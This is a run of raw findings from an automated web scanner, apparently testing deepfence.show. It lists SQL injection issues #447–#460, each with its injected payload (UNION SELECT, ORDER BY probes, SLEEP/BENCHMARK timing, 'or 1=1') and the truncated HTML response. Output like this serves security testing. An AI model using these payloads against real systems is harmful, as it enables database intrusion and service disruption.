href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #447\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #448\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #449\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #450\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #451\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #452Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #453\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor 1=1/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #454\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #455\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #456\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io RANDOMBLOB(500000000/2)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #457\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #458\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #459\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 2--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #460Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 30--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 